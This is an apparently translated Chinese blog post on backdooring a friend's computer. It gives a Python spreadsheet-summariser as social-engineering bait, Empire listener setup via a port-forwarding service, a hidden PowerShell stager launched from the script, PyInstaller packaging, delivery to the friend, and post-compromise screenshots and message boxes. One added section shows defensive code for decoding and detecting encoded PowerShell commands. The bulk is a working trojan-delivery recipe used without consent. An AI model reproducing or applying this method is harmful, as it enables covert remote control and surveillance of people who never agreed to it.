Remote-controlling a friend's computer

Even a post about setting up a server gets taken down, and I have no idea what was wrong with it. Speechless.
For technical exchange only; do not use for illegal purposes.


0x00 What the fish likes

A friend asked me to write a program for him. The requirement: automatically open every Excel workbook in a folder and collect the content that follows each category (sub-sheets included) into one summary sheet.

[image: 需求表.png (the requirements sheet)]

0x01 Preparing the bait

Social engineering is the key to any trojan: getting the other person to want to run your program is the first step toward success. A program designed around the friend's own needs, one that solves a problem at his job, will of course get run without any prompting.
How the functionality is implemented is not the focus of this post, so the code is attached directly below. If anything is unclear, read the comments; they are quite detailed.

#! /usr/bin/python3
# -*- coding: utf-8 -*-
# author: czy
# Spreadsheet summariser, written for 老仁總
# Needs xlrd < 2.0 (xlrd 2.x dropped .xlsx support) and xlsxwriter
# import modules
import xlrd
import xlsxwriter
import os
import subprocess

# open an Excel workbook
def open_xls(file):
    fh = xlrd.open_workbook(file)
    return fh

# number of sheets in the workbook
def getshnum(fh):
    return len(getsheet(fh))

# every sheet in the workbook
def getsheet(fh):
    return fh.sheets()

# read sheet number shnum of a workbook and append each row's third column
# to table_data under the category named in its second (or first) column
def getFilect(file, shnum, table_data):
    fh = open_xls(file)
    table = fh.sheets()[shnum]
    # number of rows
    row_count = table.nrows
    # walk every row
    for element in range(row_count):
        row = table.row_values(element)
        # first column is table_name_1, second column is table_name_2
        table_name_1 = row[0]
        table_name_2 = row[1]
        # strip spaces and newlines from the third column
        table_value_temp = str(row[2]).replace(" ", "")
        table_value = table_value_temp.replace("\n", "")
        # if the second (else the first) column names a known category,
        # store the third column under that key
        if table_name_2 in table_data:
            table_data[table_name_2].append(table_value)
        elif table_name_1 in table_data:
            table_data[table_name_1].append(table_value)

# write the final result
def savefile(table_data):
    # output file
    endfile = 'E:\\Code\\php\\python\\excel-test\\test.xlsx'
    # create the workbook with one sheet named "啦啦啦"
    workbook = xlsxwriter.Workbook(endfile)
    worksheet = workbook.add_worksheet('啦啦啦')
    # first row of the sheet: category, content
    headings = ['類別', '內(nèi)容']
    # the dictionary filled in earlier
    data = table_data
    # write headings as a row starting at A1;
    # A2 collects the values written as a column from A2 downwards,
    # B2 collects the values written as a column from B2 downwards
    # (write_column takes a list, one element per cell)
    worksheet.write_row('A1', headings)
    A2 = []
    B2 = []

    # walk the dictionary keys
    for data_key in data.keys():
        # every key goes into the A2 list
        A2.append(data_key)
        # B accumulates the joined values for this key
        B = ""
        # walk the value list of this key
        for i in range(len(data[data_key])):
            # convert each list element to a string and append it to B
            B += str(data[data_key][i])
        # the joined string goes into the B2 list
        B2.append(B)

    # write the two columns starting at A2 and B2
    worksheet.write_column('A2', A2)
    worksheet.write_column('B2', B2)
    # close the workbook (this is what flushes it to disk)
    workbook.close()

if __name__ == '__main__':
    # folder holding the source workbooks
    dir_path = 'E:/Code/php/python/excel/'
    # dictionary of categories to collect; the keys are the category labels exactly as they appear in the sheets
    table_data = {"運(yùn)營協(xié)作": [], "食品安全": [], "運(yùn)營安全": [], "保安服務(wù)": [], "宿舍管理": [], "團(tuán)隊(duì)管理": [], "倉庫管理": [], "店內(nèi)常規(guī)工作": [], "駐店工程/信息部工作": []}

    # build the path of every file in the folder
    for fl in os.listdir(dir_path):
        files_path = str(dir_path + fl)

        # fh is the opened workbook
        fh = open_xls(files_path)
        # x is the number of sheets in it
        x = getshnum(fh)
        for shnum in range(x):
            print("Reading file " + str(fl) + ", sheet " + str(shnum) + "...")
            # append this sheet's rows to the dictionary
            getFilect(files_path, shnum, table_data)

    for data_key in table_data.keys():
        # drop duplicate values while keeping the original order
        table_data[data_key] = sorted(set(table_data[data_key]), key=table_data[data_key].index)
        # strip numbering such as "1、" and "(1)" from the values
        for z in range(len(table_data[data_key])):
            for i in range(1, 11):
                x = str(i) + "、"
                y = "(" + str(i) + ")"
                table_data[data_key][z] = table_data[data_key][z].replace(x, "")
                table_data[data_key][z] = table_data[data_key][z].replace(y, "")

    savefile(table_data)

Since the sheets contain my friend's company data, the test run is not shown here.

0x02 Mixing in the seasoning

The PowerShell remote control is done with the pentest framework EMPIRE.

[image: empire.png]

Configuring the listener address
My friend and I are not at the same company, so a LAN callback is out of the question; a port-forwarding service is needed. I used Peanut Shell (花生殼), which now requires real-name registration, so don't copy this to do anything bad.

[image: 內(nèi)網(wǎng)穿透配置.png (NAT traversal configuration)]

Enter the following commands in the Empire console to configure the listener. Host is the address the stager will call back to (the forwarded public one); BindIP and Port are where Empire actually listens, and the forwarder maps one onto the other.

# go to the listeners menu
(Empire) > listeners
# use the http listener
(Empire: listeners) > uselistener http
# the forwarded address and port the agent will call back to
(Empire: listeners/http) > set Host http://<forwarded address>:<port>
# the local IP Empire binds to
(Empire: listeners/http) > set BindIP <local IP>
# the local port, 80 here
(Empire: listeners/http) > set Port 80
# name the listener
(Empire: listeners/http) > set Name test_1
# start it
(Empire: listeners/http) > execute

Once the listener is up, Empire reports "1 listeners currently active".

[image: 監(jiān)聽激活.png (listener active)]

Enter the following to get the PowerShell stager one-liner for that listener.

# go to the listeners menu
(Empire) > listeners
# print the PowerShell launcher for listener test_1
(Empire: listeners) > launcher powershell test_1

[image: powershell.png (the generated launcher)]

0x03 Loading the bait

Add a function to the program above that runs the launcher. Two things to keep in mind: the listing only defines joke(), so it still has to be called from __main__ for the stager to run at all; and p.wait() blocks until the PowerShell process exits, which for an Empire agent means until the agent dies, so calling it before the spreadsheet work would stall the "useful" part of the program.

def joke():
    # the one-liner printed by "launcher powershell test_1"; the base64 payload is omitted here.
    # -noP: no profile, -sta: single-threaded apartment, -w 1: hidden window, -enc: base64 UTF-16LE script
    code = "powershell -noP -sta -w 1 -enc <encoded payload omitted>"
    p = subprocess.Popen(code, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # blocks until the PowerShell process (and with it the agent) exits
    p.wait()

Install pyinstaller to package the Python script as a single .exe.

# install pyinstaller
pip install pyinstaller
# change into the directory holding the program and run:
# -F: one single file; -w: windowed, no console; -i: icon file; hello.py is the program written above
pyinstaller -F -w -i heihei.ico hello.py

After it runs, a dist folder is created and the executable is inside it. (Will shipping it with a little-devil icon raise his guard? Ha.)

[image: 木馬.png (the trojan)]
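As an added example, not code from the original post or from Empire: this is how the string handed to -enc is built, and how a defender can pull such a command back out of a blob of bytes such as a process-creation log line or the script extracted from the PyInstaller bundle. PowerShell's -EncodedCommand (-enc) takes base64 over the UTF-16LE encoding of the script, which is exactly the transform the launcher powershell test_1 output applies to the stager. The sample script and byte blob are constructed stand-ins, and the names encode_command, decode_command and find_encoded_commands are this example's own.

```python
#! /usr/bin/python3
# Added example, not part of the original post or of Empire: build and
# decode the base64/UTF-16LE string PowerShell expects after -enc, and scan
# a byte blob for such invocations. All sample data below is constructed.
import base64
import re


def encode_command(script: str) -> str:
    """Return what PowerShell's -EncodedCommand (-enc) expects: base64 of the
    script's UTF-16LE bytes. This is the transform the Empire launcher applies."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse of encode_command. Raises ValueError (binascii.Error) on bad
    base64 and UnicodeDecodeError if the bytes are not valid UTF-16LE."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


# powershell[.exe], any flags on the same line, then -e / -ec / -enc /
# -EncodedCommand followed by the base64 token. Case-insensitive because
# PowerShell accepts any casing of its switches.
_ENC_RE = re.compile(
    rb"powershell(?:\.exe)?[^\r\n\"']*?"
    rb"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)


def find_encoded_commands(data: bytes):
    """Scan data for powershell -enc invocations and return a list of
    (base64_token, decoded_script). Tokens that fail to decode are kept,
    with the error text in place of the script, so nothing is silently dropped."""
    hits = []
    for m in _ENC_RE.finditer(data):
        token = m.group(1).decode("ascii")
        try:
            hits.append((token, decode_command(token)))
        except (ValueError, UnicodeDecodeError) as exc:
            hits.append((token, "<undecodable: %s>" % exc))
    return hits


# Constructed stand-ins for the stager and for the bytes it might be found in
SAMPLE_SCRIPT = "Write-Output 'stager placeholder'"
SAMPLE_BLOB = (
    b"\x00\x01PYZ random bytes before the string\x00"
    + b"powershell -noP -sta -w 1 -enc " + encode_command(SAMPLE_SCRIPT).encode("ascii")
    + b"\x00random bytes after the string\x00"
)

if __name__ == "__main__":
    for token, script in find_encoded_commands(SAMPLE_BLOB):
        print(token[:24] + "...", "->", script)
```

Two caveats if you reuse this as a check. PyInstaller's -F build stores the script as a compressed, marshalled code object, so scanning the .exe on disk for the literal string finds nothing until the archive is unpacked; at runtime, however, the full command line is visible as the argument list of the powershell.exe child process (Sysmon event ID 1, or Windows 4688 with command-line auditing enabled), and that is where the regex earns its keep. And -w 1 only hides the window; it does not hide the process.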

0x04 Casting the line

Bro, catch this poisoned bait.

[image: 投放毒飼料.png (delivering the poisoned bait)]

0x05 Hooked, reel it in

An agent showing up means the other side has called back with a shell (its name is P3GTUSB7).

[image: 遠(yuǎn)程連接.png (remote connection)]

The agent is online.

[image: agents信息.png (agent information)]

Enter the following to interact with the agent:

interact P3GTUSB7

Type sc to take a screenshot and see what the desktop looks like.

[image: 截圖.png (screenshot)]

Windows 7, how low.

[image: 桌面.png (desktop)]

Use usemodule trollsploit/message to pop a message box on his screen.

[image: 小窗口.png (message box)]

That's the end of the prank; I'm off to study. Kids reading this post: don't run random programs.

[image: 很好用.png]
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 官網(wǎng) 中文版本 好的網(wǎng)站 Content-type: text/htmlBASH Section: User ...
    不排版閱讀 4,715評(píng)論 0 5
  • linux資料總章2.1 1.0寫的不好抱歉 但是2.0已經(jīng)改了很多 但是錯(cuò)誤還是無法避免 以后資料會(huì)慢慢更新 大...
    數(shù)據(jù)革命閱讀 13,251評(píng)論 2 33
  • 壬辰年二月,春初涉,有友相約仁壽一游。同去者十又五,皆相聚春秋三載。性不同,志相投,山水樂者矣。二五逢休憩,朗日和...
    林云_09ae閱讀 407評(píng)論 4 4
  • 因?yàn)轫?xiàng)目需要,所以準(zhǔn)備了解點(diǎn)這方面的前端開發(fā)技術(shù),話說,以前就知道個(gè)flash ,還真不知道它還有個(gè)兄弟flex ...
    三個(gè)小皮匠閱讀 317評(píng)論 0 0
  • 剛開始接觸寫作,是在初二的時(shí)候。那一年自己寫了一本紙質(zhì)的只有三萬字的小說,盡管現(xiàn)在看上去無論是文筆還是內(nèi)容都十分...
    殺死那個(gè)月亮閱讀 418評(píng)論 18 7

友情鏈接更多精彩內(nèi)容